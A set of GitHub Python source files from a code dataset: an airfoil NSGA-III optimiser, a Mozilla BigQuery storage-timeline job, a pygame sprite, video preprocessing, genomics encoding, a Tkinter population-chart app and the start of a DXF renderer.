#淘汰\n # Select the next generation population from parents and offspring\n pop = toolbox.select(pop + offspring, MU)\n\n\n print(\"------objs_before-------\")\n print(obj1_max,obj2_max,obj3_max)\n #最大値取得\n pop_fit = numpy.array([ind.fitness.values for ind in pop])\n fits1 = [obj[0] for obj in pop_fit]\n _obj1_max = max(fits1)\n fits2 = [obj[1] for obj in pop_fit]\n _obj2_max = max(fits2)\n fits3 = [obj[2] for obj in pop_fit]\n _obj3_max = max(fits3)\n\n #最大値に応じて正規化\n if _obj1_max <= 1.0:\n obj1_max = _obj1_max\n if _obj2_max <= 1.0:\n obj2_max = _obj2_max\n if _obj3_max <= 1.0:\n obj3_max = _obj3_max\n\n print(\"------objs_after-------\")\n print(obj1_max,obj2_max,obj3_max)\n\n #======================================================\n #---------途中経過プロット----------\n\n ##1世代ごとに翼型を書き出す\n k = 0\n for ind in pop[:10]:\n global code_division\n ratios = decoder(ind,code_division)\n try:\n k += 1\n datlist_list = [fc.read_datfile(file) for file in datfiles]\n datlist_shaped_list = [fc.shape_dat(datlist) for datlist in datlist_list]\n newdat = fc.interpolate_dat(datlist_shaped_list,ratios)\n fc.write_datfile(datlist=newdat,newfile_name = \"newfoil\"+str(k)+str(\".dat\"))\n except Exception as e:\n print(\"message:{0}\".format(e))\n #\n\n ##翼型それぞれの評価値を出力する\n k = 0\n for ind, fit in zip(pop, pop_fit):\n try:\n k += 1\n print(k)\n print(\"individual:\" + str(ind) + \"\\nfit:\" + str(fit))\n except Exception as e:\n print(\"message:{0}\".format(e))\n #\n\n plt.cla()#消去\n ##新翼型の描画\n datlist_list = [fc.read_datfile(file) for file in datfiles]\n datlist_shaped_list = [fc.shape_dat(datlist) for datlist in datlist_list]\n newdat = fc.interpolate_dat(datlist_shaped_list,decoder(pop[0],code_division))\n fc.write_datfile(datlist=newdat,newfile_name = \"./foil_dat_gen/newfoil_gen\"+str(gen)+str(\".dat\"))\n plt.title('generation:'+str(gen))\n newdat_x = [dat[0] for dat in newdat]\n newdat_y = [dat[1] for dat in newdat]\n plt.xlim([0,1])\n plt.ylim([-0.5,0.5])\n plt.plot(newdat_x,newdat_y)\n plt.savefig(\"./newfoil_gen/newfoil_gen\"+str(gen)+\".png\")\n plt.draw()#描画\n plt.pause(0.1)#描画待機\n\n ##評価値のプロット\n fig = plt.figure(figsize=(7, 7))\n ax = fig.add_subplot(111, projection=\"3d\")\n p = [ind.fitness.values for ind in pop]\n p1 = [i[0] for i in p]\n p2 = [j[1] for j in p]\n p3 = [k[2] for k in p]\n ax.set_xlim(0,obj1_max)\n ax.set_ylim(0,obj2_max)\n ax.set_zlim(0,obj3_max)\n ax.scatter(p1, p2, p3, marker=\"o\", s=24, label=\"Final Population\")\n ref = tools.uniform_reference_points(NOBJ, P)\n ax.scatter(ref[:, 0], ref[:, 1], ref[:, 2], marker=\"o\", s=24, label=\"Reference Points\")\n ax.view_init(elev=11, azim=-25)\n #ax.autoscale(tight=True)\n plt.legend()\n plt.title(\"nsga3_gen:\"+str(gen))\n plt.tight_layout()\n plt.savefig(\"./nsga3_gen/nsga3_gen\"+str(gen)+\".png\")\n plt.close()\n #======================================================\n\n\n # Compile statistics about the new population\n record = stats.compile(pop)\n logbook.record(gen=gen, evals=len(invalid_ind), **record)\n print(logbook.stream)\n\n return pop, logbook\n\n\nif __name__ == \"__main__\":\n try:\n pop, stats = main()\n except KeyboardInterrupt:\n print(\"Ctrl + Cで停止しました\")\n pass\n\n pop_fit = numpy.array([ind.fitness.values for ind in pop])\n\n k = 0\n for ind, fit in zip(pop[:10], pop_fit[:10]):\n try:\n k += 1\n datlist_list = [fc.read_datfile(file) for file in datfiles]\n datlist_shaped_list = [fc.shape_dat(datlist) for datlist in datlist_list]\n newdat = fc.interpolate_dat(datlist_shaped_list,decoder(ind,code_division))\n fc.write_datfile(datlist=newdat,newfile_name = \"newfoil\"+str(k)+str(\".dat\"))\n except Exception as e:\n print(\"message:{0}\".format(e))\n k = 0\n for ind, fit in zip(pop, pop_fit):\n try:\n k += 1\n print(k)\n print(\"individual:\" + str(ind) + \"\\nfit:\" + str(fit))\n except Exception as e:\n print(\"message:{0}\".format(e))\n\n #pf = problem.pareto_front(ref_points)\n #print(igd(pop_fit, pf))\n\n fig = plt.figure(figsize=(7, 7))\n ax = fig.add_subplot(111, projection=\"3d\")\n\n p = numpy.array([ind.fitness.values for ind in pop])\n ax.scatter(p[:, 0], p[:, 1], p[:, 2], marker=\"o\", s=24, label=\"Final Population\")\n\n #ax.scatter(pf[:, 0], pf[:, 1], pf[:, 2], marker=\"x\", c=\"k\", s=32, label=\"Ideal Pareto Front\")\n\n ref_points = tools.uniform_reference_points(NOBJ, P)\n\n ax.scatter(ref_points[:, 0], ref_points[:, 1], ref_points[:, 2], marker=\"o\", s=24, label=\"Reference Points\")\n\n ax.view_init(elev=11, azim=-25)\n ax.autoscale(tight=True)\n plt.legend()\n plt.tight_layout()\n plt.savefig(\"nsga3.png\")\n","repo_name":"melonTai/foilOpt","sub_path":"multiprocessing/main_xfexe.py","file_name":"main_xfexe.py","file_ext":"py","file_size_in_byte":14019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33044813314","text":"\"\"\"\nDetermine BigQuery table storage timeline per day.\n\nTo read more on the source table, please visit:\nhttps://cloud.google.com/bigquery/docs/information-schema-table-storage-timeline\n\"\"\"\n\nfrom argparse import ArgumentParser\n\nfrom google.cloud import bigquery\n\nDEFAULT_PROJECTS = [\n \"mozdata\",\n \"moz-fx-data-shared-prod\",\n \"moz-fx-data-marketing-prod\",\n]\n\nparser = ArgumentParser(description=__doc__)\nparser.add_argument(\"--date\", required=True) # expect string with format yyyy-mm-dd\nparser.add_argument(\"--project\", default=\"moz-fx-data-shared-prod\")\n# projects queries were run from that access table\nparser.add_argument(\"--source_projects\", nargs=\"+\", default=DEFAULT_PROJECTS)\nparser.add_argument(\"--destination_dataset\", default=\"monitoring_derived\")\nparser.add_argument(\n \"--destination_table\", default=\"bigquery_table_storage_timeline_daily_v1\"\n)\n\n\ndef create_query(date, source_project):\n \"\"\"Create query for a source project. 1GB = POW(1024, 3) bytes.\"\"\"\n return f\"\"\"\n SELECT\n DATE('{date}') AS change_date,\n project_id,\n table_schema AS dataset_id,\n table_name AS table_id,\n deleted,\n DATE(creation_time) AS creation_date,\n count(*) AS change_count,\n avg(total_rows) AS avg_total_rows,\n avg(total_partitions) AS avg_total_partitions,\n avg(total_logical_bytes) AS avg_total_logical_bytes,\n avg(active_logical_bytes) AS avg_active_logical_bytes,\n avg(long_term_logical_bytes) AS avg_long_term_logical_bytes,\n avg(total_physical_bytes) AS avg_total_physical_bytes,\n avg(active_physical_bytes) AS avg_active_physical_bytes,\n avg(long_term_physical_bytes) AS avg_long_term_physical_bytes,\n avg(time_travel_physical_bytes) AS avg_time_travel_physical_bytes\n FROM `{source_project}.region-us.INFORMATION_SCHEMA.TABLE_STORAGE_TIMELINE`\n WHERE\n DATE(timestamp) = '{date}'\n GROUP BY change_date, project_id, dataset_id, table_id, deleted, creation_date\n ORDER BY change_date, project_id, dataset_id, table_id, deleted, creation_date\n \"\"\"\n\n\ndef main():\n \"\"\"Run query for each source project.\"\"\"\n args = parser.parse_args()\n\n partition = args.date.replace(\"-\", \"\")\n destination_table = f\"{args.project}.{args.destination_dataset}.{args.destination_table}${partition}\"\n\n # remove old partition in case of re-run\n client = bigquery.Client(args.project)\n client.delete_table(destination_table, not_found_ok=True)\n\n for project in args.source_projects:\n client = bigquery.Client(project)\n query = create_query(args.date, project)\n job_config = bigquery.QueryJobConfig(\n destination=destination_table, write_disposition=\"WRITE_APPEND\"\n )\n client.query(query, job_config=job_config).result()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mozilla/bigquery-etl","sub_path":"sql/moz-fx-data-shared-prod/monitoring_derived/bigquery_table_storage_timeline_daily_v1/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"31"} +{"seq_id":"19877879414","text":"import pygame\nimport random\nfrom pygame.math import Vector2\n\ncell_size = 16\ncell_number = 30\n\nclass Rocket:\n def __init__(self, mode) -> None:\n self.mode = mode\n self.sprite = self.sprite()\n self.randomize()\n self.acc = 0.05\n\n def sprite(self):\n if self.mode == 0:\n return pygame.image.load(\"Assets/Spear.png\")\n elif self.mode == 1:\n return pygame.image.load(\"Assets/Spear.png\")\n\n def randomize(self):\n self.x = random.randint(0, cell_number - 1)\n self.y = 0\n self.position = Vector2(self.x, self.y)\n \n def move(self):\n self.y += 1 * self.acc\n self.position = Vector2(self.x, self.y)\n\n def out_of_frame(self):\n return self.position.y * cell_size <= 800\n \n def draw_rocket(self, Surface):\n if self.out_of_frame():\n self.move()\n self.rocket_rect = pygame.Rect(int(self.position.x * cell_size), int(self.position.y * cell_size), cell_size, cell_size * 3)\n self.small_rect = pygame.Rect(int(self.position.x * cell_size), int(self.position.y * cell_size) + cell_size + cell_size, cell_size, cell_size)\n\n if self.mode == 0:\n for i in range(3):\n rect = pygame.Rect(int(self.position.x * cell_size), int(self.position.y * cell_size) + i * cell_size, cell_size, cell_size)\n Surface.blit(self.sprite, rect)\n \n elif self.mode == 1:\n pygame.draw.rect(Surface, pygame.Color('Black'), self.rocket_rect)","repo_name":"Reda-BELHAJ/SnakeImproved","sub_path":"Classes/Rocket.py","file_name":"Rocket.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12883284921","text":"from glob import glob\nimport os\nimport shutil\nimport ffmpeg\nimport cv2\n\ndef pre_image(args):\n\n if not args['in_image']:\n return args\n \n img = args['in_image']\n if not os.path.exists(img):\n print('Image Not Found')\n exit()\n\n pref = '.video_cache/tmp/'\n\n if os.path.exists(pref):\n shutil.rmtree(pref)\n\n os.makedirs(pref)\n shutil.copy(img, pref + \"img_0.png\")\n shutil.copy(img, pref + \"img_1.png\")\n shutil.copy(img, pref + \"img_2.png\")\n args['in_path'] = pref\n args['out_path'] = pref + '/out/'\n args['in_video'] = args['out_video'] = None\n return args\n\ndef post_image(args):\n \n if not args['out_image']:\n return\n \n pref = glob('.video_cache/tmp/out/*.png')\n if not args['out_image']:\n shutil.copy(pref[0], \"./out.png\")\n \n shutil.copy(pref[0], args['out_image'])\n shutil.rmtree('.video_cache/tmp')\n\ndef pre_process(args):\n \n if not args['in_video']:\n return args\n\n video = args['in_video']\n if not os.path.exists(video):\n print(\"Video Not Found\")\n exit(1)\n\n if not os.path.exists(\".video_cache\"):\n os.makedirs(\".video_cache\")\n\n vname = os.path.basename(video)\n dir_template = f\".video_cache/{vname}_IN/\"\n if os.path.exists(dir_template):\n shutil.rmtree(dir_template)\n os.makedirs(dir_template)\n\n v0 = cv2.VideoCapture(video)\n now = 0\n writeT = dir_template + \"I\"\n while v0.isOpened():\n ret, Frame = v0.read()\n if not ret:\n break\n cv2.imwrite(writeT + now.__str__() + \".jpg\", Frame)\n now += 1\n v0.release()\n cv2.destroyAllWindows()\n\n args['in_path'] = dir_template\n if args['out_video']:\n args['out_path'] = f\".video_cache/{vname}_out/\"\n return args\n\ndef post_process(args):\n\n if not args['out_video']:\n return args\n\n out_video = args[\"out_video\"]\n if os.path.exists(out_video):\n shutil.move(out_video, f\"{out_video}_old\")\n\n op = args['in_path'] \\\n or args['in_video'] \\\n or print('Error: No output type given') \\\n and exit(2)\n\n vname = os.path.basename(op)\n opath = f\"{args['out_path']}/*.png\" \\\n or f\".video_cache/{vname}_out/*.png\"\n\n ffmpeg.input(\n opath\n , pattern_type='glob'\n , framerate=20).output(out_video).run()","repo_name":"nageshnero/Video-Noise-reduction","sub_path":"process_video.py","file_name":"process_video.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42145360562","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nimport os\r\nimport subprocess\r\nimport sys\r\n\r\n\r\ncmd_subfolder = os.path.dirname(os.path.abspath(__file__))\r\nwhile not cmd_subfolder .endswith('pydeepgenomics'):\r\n cmd_subfolder = os.path.dirname(cmd_subfolder)\r\ncmd_subfolder = os.path.dirname(cmd_subfolder)\r\ntry:\r\n from pydeepgenomics.preprocess import encoding, settings\r\n from pydeepgenomics.preprocess.vcf import vcf\r\n from pydeepgenomics.tools import generaltools as gt\r\nexcept ImportError:\r\n if cmd_subfolder not in sys.path:\r\n sys.path.append(cmd_subfolder)\r\n from pydeepgenomics.preprocess import encoding, settings\r\n from pydeepgenomics.preprocess.vcf import vcf\r\n from pydeepgenomics.tools import generaltools as gt\r\n\r\nPATH_TO_PLAYGROUND = os.path.join(\r\n os.path.dirname(os.path.abspath(__file__)),\r\n \"playground\")\r\n\r\n\r\ndef example_2(VERBOSE=True):\r\n subprocess.call(\r\n \"python \"+os.path.join(os.path.dirname(__file__), \"setup_ex_env.py\"),\r\n shell=True)\r\n list_chrs = gt.list_elements(\r\n PATH_TO_PLAYGROUND,\r\n type_=\"file\",\r\n extension=\".vcf.gz\")\r\n list_chrs = [os.path.basename(i).split(\".\")[0] for i in list_chrs]\r\n\r\n vcf.split_vcf_files(PATH_TO_PLAYGROUND, verbose=False)\r\n\r\n for chr_to_be_processed in list_chrs:\r\n print(\r\n \"###########################################\\n\" +\r\n \"Processing chr {}\".format(chr_to_be_processed))\r\n path_to_data = os.path.join(\r\n PATH_TO_PLAYGROUND, \"split_by_chr\", str(chr_to_be_processed))\r\n encoding.encode_file_positions(\r\n chr_to_be_processed,\r\n path_to_data,\r\n PATH_TO_PLAYGROUND,\r\n verbose=VERBOSE)\r\n encoding.verify_decoding(\r\n os.path.join(PATH_TO_PLAYGROUND, \"split_by_chr\"),\r\n os.path.join(PATH_TO_PLAYGROUND, \"encoded_files\"),\r\n str(chr_to_be_processed),\r\n nb_of_tests_per_file=10,\r\n max_nb_of_files_to_test=100,\r\n verbose=VERBOSE)\r\n\r\nif __name__ == \"__main__\":\r\n example_2()\r\n","repo_name":"digitalepidemiologylab/pydeepgenomics","sub_path":"pydeepgenomics/preprocess/examples/2_encode_genotypes.py","file_name":"2_encode_genotypes.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16700443341","text":"import json\nimport os\nimport sqlite3\nimport sys\nimport textwrap\nimport tkinter as tk\nfrom tkinter import *\nfrom tkinter import ttk\nimport docx\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image, ImageTk\nfrom docx.enum.text import WD_PARAGRAPH_ALIGNMENT\n\nconnection = sqlite3.connect('database.db')\n\n\ndef read_json_file(file_path):\n with open(file_path, 'r', encoding='utf-8') as file:\n data = json.load(file)\n return data\n\n\ndef get_column_names(data):\n column_names = set()\n\n def extract_keys(obj):\n if isinstance(obj, dict):\n column_names.update(obj.keys())\n for value in obj.values():\n extract_keys(value)\n elif isinstance(obj, list):\n for item in obj:\n extract_keys(item)\n\n extract_keys(data)\n return column_names\n\n\ndef create_table(db_connection, table_name, columns):\n columns_with_types = ', '.join(f'{column} TEXT' for column in columns)\n create_table_query = f'CREATE TABLE IF NOT EXISTS {table_name} ({columns_with_types})'\n cursor = db_connection.cursor()\n cursor.execute(f\"DROP TABLE IF EXISTS {table_name}\")\n cursor.execute(create_table_query)\n\n\ndef insert_data(db_connection, table_name, data, columns):\n cursor = db_connection.cursor()\n\n def insert_rows(obj):\n if isinstance(obj, dict):\n values = [obj.get(column, '') for column in columns]\n cursor.execute(f'INSERT INTO {table_name} VALUES ({\",\".join([\"?\"] * len(columns))})', values)\n elif isinstance(obj, list):\n for item in obj:\n insert_rows(item)\n\n insert_rows(data)\n db_connection.commit()\n\n\ndef select_all_data(db_connection, table_name):\n cursor = db_connection.cursor()\n cursor.execute(f\"SELECT * FROM {table_name}\")\n rows = cursor.fetchall()\n return rows\n\n\ndef db_manager():\n json_data = read_json_file('data.json')\n columns = list(get_column_names(json_data))\n create_table(connection, 'my_table', columns)\n insert_data(connection, 'my_table', json_data, columns)\n\n rows = select_all_data(connection, 'my_table')\n print(columns)\n\n\ndef select_countries():\n cursor = connection.cursor()\n cursor.execute(\"SELECT country FROM my_table\")\n countries = []\n rows = cursor.fetchall()\n for row in rows:\n countries.append(row[0])\n\n return countries\n\n\ndef get_plot_dict(country):\n cursor = connection.cursor()\n cursor.execute(\"SELECT pop1980,pop2000,pop2010,pop2022,pop2023,pop2030,pop2050 FROM my_table WHERE country = ?\",\n (country,))\n row = cursor.fetchone()\n data_dict = {}\n\n if row is not None:\n column_names = [1980, 2000, 2010, 2022, 2023, 2030, 2050]\n\n for i, column in enumerate(column_names):\n value = row[i]\n if value.isdigit():\n data_dict[column] = int(value)\n else:\n data_dict[column] = float(value)\n\n return data_dict\n\n\ndef draw_chart(dictionary, country, plot_type):\n filtered_data = {key: value for key, value in dictionary.items() if value != 0}\n print(\"In draw function\")\n x = list(filtered_data.keys())\n y = list(filtered_data.values())\n\n plt.ylim(0, max(y))\n plt.figure(figsize=(10, 6))\n plt.xlabel(\"Year\")\n plt.ylabel(\"Population\")\n plt.title(\"Population by year in \" + country)\n plt.ticklabel_format(style='plain') # Disable scaling on y-axis\n\n if plot_type == \"Bar chart\":\n plt.bar(x, y)\n elif plot_type == \"Line chart\":\n plt.plot(x, y)\n elif plot_type == \"Pie chart\":\n plt.pie(y, labels=x)\n else:\n raise ValueError(\"Invalid chart type provided.\")\n\n plt.savefig(\"plot.png\")\n\n\ndef get_general_plot_dict(year):\n cursor = connection.cursor()\n cursor.execute(f\"SELECT country, pop{year} FROM my_table\")\n rows = cursor.fetchall()\n data_dict = {row[0]: row[1] for row in rows}\n return data_dict\n\n\ndef draw_general_plot(dict, plot_type, year):\n filtered_data = {key: value for key, value in dict.items() if value != 0}\n x = list(filtered_data.keys())\n y = [float(value) for value in filtered_data.values()]\n\n plt.figure(figsize=(10, 6))\n plt.ylim(0, max(y))\n plt.ylabel(\"Population\")\n plt.xticks([]) # Remove x-axis labels\n plt.yticks(np.arange(10_000_000, max(y) + max(y) / 10, 50_000_000))\n plt.ticklabel_format(style='plain') # Disable scaling on y-axis\n\n plt.title(f\"Population by year in {year}\")\n\n if plot_type == \"Bar chart\":\n plt.bar(x, y)\n elif plot_type == \"Line chart\":\n plt.plot(x, y)\n elif plot_type == \"Pie chart\":\n plt.pie(y, labels=x)\n else:\n raise ValueError(\"Invalid chart type provided.\")\n\n plt.savefig(\"plot.png\")\n\n\ndef resize_image(imagename, width, height):\n image = Image.open(imagename)\n resized_image = image.resize((width, height))\n\n tk_image = ImageTk.PhotoImage(resized_image)\n\n return tk_image\n\n\ndef calculate_aggregation(arguments):\n cursor = connection.cursor()\n\n def average_population():\n years = [1980, 2000, 2010, 2022, 2023, 2030, 2050]\n avg_population_dict = {year: 0 for year in years}\n total = 0\n\n for year in years:\n cursor.execute(f\"SELECT pop{year} FROM my_table\")\n rows = cursor.fetchall()\n i = 0\n for row in rows:\n total += int(row[0])\n i += 1\n\n avg_population_dict[year] = int(total / i)\n return avg_population_dict\n\n def maximal_population():\n years = [1980, 2000, 2010, 2022, 2023, 2030, 2050]\n population_dict = {year: 0 for year in years}\n\n for year in years:\n max_val = 0\n country = \"\"\n cursor.execute(f\"SELECT pop{year}, country FROM my_table\")\n rows = cursor.fetchall()\n for row in rows:\n if int(row[0]) > max_val:\n max_val = int(row[0])\n country = row[1]\n\n population_dict[year] = f\"{max_val} in {country}\"\n return population_dict\n\n def minimal_population():\n years = [1980, 2000, 2010, 2022, 2023, 2030, 2050]\n population_dict = {year: 0 for year in years}\n\n for year in years:\n min_val = sys.maxsize\n min_country = \"\"\n cursor.execute(f\"SELECT pop{year}, country FROM my_table\")\n rows = cursor.fetchall()\n for row in rows:\n if int(row[0]) < min_val:\n min_val = int(row[0])\n min_country = row[1]\n\n population_dict[year] = f\"{min_val} in {min_country}\"\n return population_dict\n\n def max(arg):\n max_val = 0\n country = ''\n cursor.execute(f\"SELECT country, {arg} FROM my_table\")\n rows = cursor.fetchall()\n for row in rows:\n if float(row[1]) > max_val:\n max_val = float(row[1])\n country = row[0]\n\n return country, max_val\n\n def min(arg):\n min_val = sys.maxsize\n country = ''\n cursor.execute(f\"SELECT country, {arg} FROM my_table\")\n rows = cursor.fetchall()\n for row in rows:\n if float(row[1]) < min_val:\n min_val = float(row[1])\n country = row[0]\n\n return country, min_val\n\n output = \"\"\n for arg in arguments:\n if len(arg.split(\" \")) == 2:\n function, argument = arg.split(\" \")\n if function == \"Maximal\":\n output += f\"Maximal {argument}: \" + str(max(argument)) + \"\\n\"\n elif function == \"Minimal\":\n output += f\"Minimal {argument}: \" + str(min(argument)) + \"\\n\"\n elif arg == \"Maximal population by year\":\n output += \"Maximal population by year: \\n\"\n for key, value in maximal_population().items():\n output += f\"{key}: {value} \\n\"\n elif arg == \"Minimal population by year\":\n output += \"Minimal population by year: \\n\"\n for key, value in minimal_population().items():\n output += f\"{key}: {value} \\n\"\n elif arg == \"Average population by year\":\n output += \"Average population by year: \\n\"\n for key, value in average_population().items():\n output += f\"{key}: {value} \\n\"\n return output\n\n\ndef generate_report(docx_name, paragraph_dict):\n if os.path.exists(docx_name):\n filename, extension = os.path.splitext(docx_name)\n count = 1\n while os.path.exists(f\"{filename}({count}){extension}\"):\n count += 1\n\n docx_name = f\"{filename}({count}){extension}\"\n\n document = docx.Document()\n\n title_paragraph = document.add_paragraph()\n title_paragraph_run = title_paragraph.add_run(\"Countires analyser\")\n title_paragraph_run.bold = True\n title_paragraph_run.font.size = docx.shared.Pt(22)\n title_paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n\n report_author_paragraph = document.add_paragraph()\n report_author_paragraph_run = report_author_paragraph.add_run(\"Bohdan Kyryliuk\")\n report_author_paragraph_run.font.size = docx.shared.Pt(18)\n report_author_paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n\n author_paragraph = document.add_paragraph()\n author_paragraph_run = author_paragraph.add_run(\"267855\")\n author_paragraph_run.font.size = docx.shared.Pt(18)\n author_paragraph.alignment = WD_PARAGRAPH_ALIGNMENT.CENTER\n\n document.add_page_break()\n\n plot_paragraph = document.add_paragraph()\n plot_paragraph_run = plot_paragraph.add_run()\n image = Image.open(\"plot.png\")\n resized_image = image.resize((400, 400))\n resized_image.save(\"resized_plot.png\")\n plot_paragraph_run.add_picture(\"resized_plot.png\")\n\n plot_report = paragraph_dict\n plot_report_paragraph = document.add_paragraph()\n plot_report_paragraph_run = plot_report_paragraph.add_run(plot_report)\n plot_report_paragraph_run.font.size = docx.shared.Pt(18)\n\n document.save(docx_name)\n\n\ndef create_main_window():\n main_window = tk.Tk()\n screen_width = main_window.winfo_screenwidth()\n screen_height = main_window.winfo_screenheight()\n main_window_x = (screen_width - 1000) // 2\n main_window_y = (screen_height - 700) // 2\n main_window.geometry(f\"{1000}x{700}+{main_window_x}+{main_window_y - 50}\")\n selected_checkboxes = []\n status_line_canvas = None\n\n main_window.title(\"Chart\")\n main_window.resizable(False, False)\n\n def create_statistics_combo_box():\n combo = tk.ttk.Combobox(main_window, state=\"readonly\")\n combo_items = ['General'] + select_countries()\n combo['values'] = combo_items\n combo.place(x=30, y=45)\n combo.current(0) # Set the default selected option\n global selected_country\n selected_country = \"General\"\n create_year_combo_box(True)\n\n def on_chart_select(event):\n global selected_country\n selected_country = combo.get()\n if selected_country == \"General\":\n create_year_combo_box(True)\n else:\n create_year_combo_box(False)\n\n combo.bind('<>', on_chart_select)\n\n def create_chart_type_combo_box():\n combo = tk.ttk.Combobox(main_window, state=\"readonly\")\n combo['values'] = [\"Bar chart\", \"Line chart\", \"Pie chart\"]\n combo.place(x=30, y=105)\n combo.current(0) # Set the default selected option\n global selected_plot_type\n selected_plot_type = \"Bar chart\"\n\n # Function to handle the chart selection\n def on_chart_select(event):\n global selected_plot_type\n selected_plot_type = combo.get()\n\n combo.bind('<>', on_chart_select)\n\n def create_year_combo_box(enabled):\n combo = tk.ttk.Combobox(main_window, state=\"readonly\")\n combo['values'] = [\"1980\", \"2000\", \"2010\", \"2022\", \"2023\", \"2030\", \"2050\"]\n combo.place(x=30, y=165)\n combo.current(0) # Set the default selected option\n if enabled:\n combo[\"state\"] = \"enabled\"\n else:\n combo[\"state\"] = \"disabled\"\n global selected_year\n selected_year = \"1980\"\n\n # Function to handle the chart selection\n def on_chart_select(event):\n global selected_year\n selected_year = combo.get()\n\n combo.bind('<>', on_chart_select)\n\n def create_labels():\n label_combo = tk.Label(main_window, text=\"Choose chart statistics\")\n label_combo.place(x=30, y=15)\n\n label_chart_type = tk.Label(main_window, text=\"Choose chart type\")\n label_chart_type.place(x=30, y=75)\n\n label_year = tk.Label(main_window, text=\"Choose year\")\n label_year.place(x=30, y=135)\n\n label_filename_text = tk.Label(main_window, text=\"Enter report name\")\n label_filename_text.place(x=30, y=527)\n\n def create_buttons():\n button_aggregation = tk.Button(main_window, text=\"Display aggregation\", command=on_button_aggregation_clicked,\n width=19, height=1)\n button_aggregation.place(x=30, y=493)\n\n button_chart = tk.Button(main_window, text=\"Draw chart\", command=on_button_chart_clicked, width=19, height=1)\n button_chart.place(x=30, y=195)\n\n button_generate_report = tk.Button(main_window, text=\"Generate report\",\n command=on_button_generate_report_clicked, width=19, height=1)\n button_generate_report.place(x=30, y=583)\n\n button_settings = tk.Button(main_window, text=\"Settings\", command=draw_chart, width=19, height=1)\n button_settings.place(x=30, y=613)\n\n def create_text_fields():\n global filename_text_field\n filename_text_field = tk.Entry(main_window, width=23, bg='white')\n filename_text_field.place(x=30, y=557)\n\n def on_button_chart_clicked():\n if selected_country != \"General\":\n update_status_line(f\"{selected_plot_type} about {selected_country} population has been generated successfully!\")\n draw_chart(get_plot_dict(selected_country), selected_country, selected_plot_type)\n else:\n update_status_line(f\"General {selected_plot_type} of population in {selected_year} has been generated successfully!\")\n draw_general_plot(get_general_plot_dict(int(selected_year)), selected_plot_type, int(selected_year))\n\n global image\n image = resize_image(\"plot.png\", 766, 560)\n\n create_main_canvas().create_image(0, 0, anchor=tk.NW, image=image)\n\n def on_button_aggregation_clicked():\n global selected_checkboxes\n canvas = create_main_canvas()\n x_coordinate, y_coordinate = 10, 10\n canvas.delete(\"all\")\n text = calculate_aggregation(selected_checkboxes)\n\n update_status_line(f\"Aggregation about {selected_checkboxes} has been generated successfully!\")\n\n canvas.create_text(x_coordinate + 10, y_coordinate, text=text, anchor=tk.NW, font=(\"Tahoma\", 11))\n\n def on_button_generate_report_clicked():\n global filename_text, selected_checkboxes\n if filename_text_field.get() == \"\":\n filename_text = \"report.docx\"\n else:\n filename_text = filename_text_field.get() + \".docx\"\n if 'selected_checkboxes' not in globals():\n selected_checkboxes = []\n\n update_status_line(f\"Report {filename_text} has been generated successfully!\")\n\n generate_report(filename_text, calculate_aggregation(selected_checkboxes))\n\n def create_checkboxes():\n checkboxes = {}\n y_coordinate = 225\n # Create the checkboxes\n checkbox_texts = [\"Maximal population by year\", \"Minimal population by year\", \"Average population by year\",\n \"Maximal area\", \"Minimal area\", \"Maximal density\", \"Minimal density\", \"Maximal growthRate\",\n \"Minimal growthRate\"]\n\n def update_selected_checkboxes():\n global selected_checkboxes\n selected_checkboxes = [text for text, checkbox_var in checkboxes.items() if checkbox_var.get()]\n update_status_line(f\"User selected {selected_checkboxes}\")\n\n for text in checkbox_texts:\n checkbox_var = tk.BooleanVar()\n checkbox = tk.Checkbutton(main_window, text=text, variable=checkbox_var, command=update_selected_checkboxes)\n checkbox.place(x=30, y=y_coordinate)\n y_coordinate += 30\n checkboxes[text] = checkbox_var\n\n def create_main_canvas():\n main_canvas = tk.Canvas(main_window, width=765, height=560, bg=\"#e6e6e6\")\n main_canvas.place(x=215, y=15)\n global splash_screen\n splash_screen = resize_image(\"population_analyser.png\", 766, 560)\n main_canvas.create_image(0, 0, anchor=tk.NW, image=splash_screen)\n return main_canvas\n\n def create_console_canvas():\n global status_line_canvas\n status_line_canvas = tk.Canvas(main_window, width=950, height=110, bg=\"#cccccc\")\n status_line_canvas.place(x=215, y=580)\n return status_line_canvas\n\n def update_status_line(string):\n global status_line_canvas\n status_line_canvas.delete(\"all\")\n divided_string = textwrap.fill(string, width=100)\n status_line_canvas.create_text(10, 10, anchor=\"nw\", text=divided_string, font=(\"Tahoma\", 11))\n\n create_statistics_combo_box()\n create_chart_type_combo_box()\n create_text_fields()\n create_checkboxes()\n create_buttons()\n create_labels()\n create_main_canvas()\n create_console_canvas()\n main_window.update()\n main_window.mainloop()\n\n\ndef main():\n create_main_window()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bodyakyryliuk/python-laboratories","sub_path":"lab12/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70609024089","text":"import cv2\nimport ezdxf\nimport numpy as np\n\n\ndef draw_hatch(img, entity, color, mask):\n for poly_path in entity.paths.paths:\n # print(poly_path.path_type_flags)\n polygon = np.array([vertex[:-1] for vertex in poly_path.vertices]).astype(int)\n if poly_path.path_type_flags & 1 == 1:\n cv2.fillPoly(img, [polygon], color)\n cv2.fillPoly(mask, [polygon], (255, 255, 255))\n else:\n cv2.fillPoly(img, [polygon], (255, 255, 255))\n return color\n\n\ndef draw_line(img, entity, color, mask):\n p1 = entity.dxf.start[:-1]\n p2 = entity.dxf.end[:-1]\n cv2.line(img, (int(p1[0]), int(p1[1])), (int(p2[0]), int(p2[1])), color, 1)\n 